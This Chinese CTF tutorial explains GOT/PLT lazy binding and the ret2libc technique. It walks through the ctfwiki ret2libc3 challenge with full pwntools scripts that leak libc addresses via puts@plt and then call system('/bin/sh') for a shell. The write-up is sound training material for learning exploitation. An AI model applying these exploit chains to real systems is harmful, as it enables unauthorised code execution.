嵌入式技术:ret2libc原理和应用讲解

嵌入式技术

1378人已加入

描述

  之前曾在Pwn入门之基础栈溢出里面曾经提过ret2libc的相关知识,但是写的比较笼统,感觉对新手还是不够友好,想通过本文对ret2libc的原理和利用进行详细讲解。

  前置知识

  GOT表和PLT表

  got表也叫全局偏移表(Global Offset Table)是Linux ELF文件中用于定位全局变量和函数的一个表。

  plt表也叫过程链接表(Procedure Linkage Table)是Linux ELF文件中用于延迟绑定的表恶,即函数第一次被调用的时候才进行绑定。

  在程序运行过程中,plt表和got表的运行过程大致如下:

  内存

  用一句话来总结就是,可执行文件里保存的是plt表的地址,对应plt地址指向的是got的地址,got表指向的是glibc中的地址

  在这里如果需要通过plt表获取函数的地址,需要保证got表已经获取了正确的地址,但如果一开始对所有函数都进行了重定位是比较麻烦且浪费资源,为此,Linux引入了延迟绑定机制。

  延迟绑定

  这种机制存在的目的是glibc为了节约系统资源,提高性能。其详细过程如下

  源程序在第一次调用一个函数时,首先去

  如果存在一个tide函数,这个函数在plt中的条目为tide@plt,在got中的条目为tide@got,那么在第一次调用bar函数时,首先会跳转到plt,伪代码如下:

  tide@plt; jmp tide@got patch tide@got

  这里会从PLT跳到GOT,如果函数从来没有调用过,那这时GOT会跳转回PLT并调用patch tide@got,这行代码的作用是将bar函数真正的地址填充到tide@got,然后跳转到bar函数真正的地址执行代码。当下次再次调用bar函数的时候,执行路径就是先跳转到tide@plt、tide@got、tide真正的地址。

  简而言之就是,当一个函数被调用过后,got表里保存了他在内存中的地址,可以通过泄漏got表内存来泄漏函数地址,然后可以根据起泄漏的函数地址获得其libc版本,从而计算其他函数在内存空间中的地址。因为libc中任意两个函数之间的偏移是固定的。

  以计算system函数在内存空间中的函数地址举例。

  1. 获取__libc_start_main函数在内存空间中的地址addr_main

  2. __libc_start_main函数相对于libc.so.6的起始地址是addr_main_offset

  3. system函数相对于libc.so.6的起始地址是addr_system_offset

  4. 则system函数在内存中真正的地址为addr_main+addr_system_offset-addr_main_offset

  在我们ret2libc中我们只需要理解为,只有执行过的函数,我们才能通过got表泄漏其地址。

  基本思路

  ret2libc是控制函数执行libc中的函数,通常是返回至某个函数的plt处。一般情况下,会选择执行system(‘/bin/sh’),因此需要找到system函数的地址 看到这里相信有的师傅就会问了,为什么不能直接跳到got表,通过前面的前置知识我们知道plt表中的地址对应的是指令,got表中的地址对应的是指令地址,而返回地址必须保存一段有效的汇编指令,所以必须要用plt表 ret2libc通常可以分为下面几种类型:

  • 程序中自身包含system函数和“/bin/sh”字符串

  • 程序中自身就有system函数,但是没有“/bin/sh”字符串

  • 程序中自身没有syetem函数和“/bin/sh”字符串,但给出了libc.so文件

  • 程序中自身没有sysetm函数和“/bin/sh”字符串,并且没有给出libc.so文件

  针对前面那三种在前面的文章中已经进行过详细讲解,本文主要是针对第四种情况进行讲解 对于没有给出libc.so文件的程序,我们可以通过泄漏出程序当中的某个函数的地址,通过查询来找出其中使用lib.so版本是哪一个,然后根据lib.so的版本去找到我们需要的system函数的地址。 针对常见的题目我们的解题思路是这样的:

  1. 利用栈溢出及puts函数泄漏出在got表中__libc_start_main函数的地址

  2. puts函数的返回地址为_start函数

  3. 利用最低的12位找出libc版本(即使程序有ASLR保护,也只是针对地址中间位进行随机,最低的12位并不会发生改变)

  4. 利用找到的libc版本计算system函数和/bin/sh字符串在内存中的正确的地址

  实战

  我们还是利用ctfwiki中的ret2libc3进行讲解 分析程序

  内存

  根据前面分析的,我们需要找到如下几个地址

  • __libc_start_main函数在got表的地址

  • _start函数的地址

  • puts函数在plt表中的地址

  __libc_start_main函数在got表中的地址

  内存

  _start函数的地址

  内存

  puts函数在plt表中的地址

  内存

  获取到这三个地址后,我们可以采用调用puts函数后,ret到main函数,用main函数里面的gets来获取libc_start的地址

  内存

  获取libc_start地址的脚本如下

  from pwn import * sh = process(‘。/ret2libc3’) puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 payload = 112 * b‘a’ + p32(puts_plt) + p32(addr_start) + p32(got_libc_start) sh.recv() sh.sendline(payload) puts_addr = u32(sh.recv(4)) success(“__libc_start_addr is:” + hex(puts_addr)) sh.recv()

  内存

  即使程序有ASLR保护,也只是针对地址中间位进行随机,最低的12位并不会发生改变,在16进制中也就是我们的最后3位,因此cd0是不会变,使用libc database search(https://libc.blukat.me/)进行查询(网上普遍推荐的是利用LibcSearcher,但是我用LibcSearcher一直没打通)

  内存

  看到这么多libc版本挨个试可能会累死,于是再来泄漏个puts的地址

  from pwn import * sh = process(‘。/ret2libc3’) puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 got_puts = 0x804a018 # 获取__libc_start的地址 payload1 = 112 * b‘a’ + p32(puts_plt) + p32(addr_start) + p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr = u32(sh.recv(4)) success(“__libc_start_addr is:” + hex(libc_start_addr)) # 获取puts的地址 payload2 = 112 * b‘a’ + p32(puts_plt) + p32(addr_start) + p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr = u32(sh.recv(4)) success(“puts_addr is:” + hex(puts_addr))

  内存

  内存

  还剩下三个了,使用下面的脚本挨个尝试吧

  from pwn import * sh = process(‘。/ret2libc3’) puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 got_puts = 0x804a018 # 获取__libc_start的地址 payload1 = 112 * b‘a’ + p32(puts_plt) + p32(addr_start) + p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr = u32(sh.recv(4)) success(“__libc_start_addr is:” + hex(libc_start_addr)) # 获取puts的地址 payload2 = 112 * b‘a’ + p32(puts_plt) + p32(addr_start) + p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr = u32(sh.recv(4)) success(“puts_addr is:” + hex(puts_addr)) sh.recv() libc_start = #通过libc database search获取 libc_system = #通过libc database search获取 libc_binsh = #通过libc database search获取 libcbase = libc_start_addr - libc_start system_addr = libcbase + libc_system binsh_addr = libcbase + libc_binsh payload = 112 * b‘a’ + p32(system_addr) + 4 * b‘a’ + p32(binsh_addr) sh.sendline(payload) sh.interactive()

  内存

  最终经过多次实验可知,libc文件是libc6_2.31-0ubuntu9_i386 最终的完整脚本如下

  from pwn import * sh = process(‘。/ret2libc3’) puts_plt = 0x8048460 addr_start = 0x80484d0 got_libc_start = 0x804a024 got_puts = 0x804a018 # 获取__libc_start的地址 payload1 = 112 * b‘a’ + p32(puts_plt) + p32(addr_start) + p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr = u32(sh.recv(4)) success(“__libc_start_addr is:” + hex(libc_start_addr)) # 获取puts的地址 payload2 = 112 * b‘a’ + p32(puts_plt) + p32(addr_start) + p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr = u32(sh.recv(4)) success(“puts_addr is:” + hex(puts_addr)) sh.recv() libc_start = 0x01edf0 libc_system = 0x045830 libc_binsh = 0x192352 libcbase = libc_start_addr - libc_start system_addr = libcbase + libc_system binsh_addr = libcbase + libc_binsh payload = 112 * b‘a’ + p32(system_addr) + 4 * b‘a’ + p32(binsh_addr) sh.sendline(payload) sh.interactive() 成功打通

  内存

  总结

  ret2libc这种题型,相较于前面简单的题目,对Linux中程序运行的理解要求更高,一开始根据网上的教程去寻找libc版本的时候发现大多数教程都是使用脚本去获取,但在自己尝试的时候就一直打不通,于是便放弃了脚本采用手工的方式进行查找,可能相较于通过脚本直接获取更加费时费力,但是也通过这个倒逼自己将got表和plt表的相关知识彻底理解透彻,也捋清楚了程序在Linux中到底是如何运行的。

  编辑:黄飞

打开APP阅读更多精彩内容
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉

全部0条评论

快来发表一下你的评论吧 !

×
20
完善资料,
赚取积分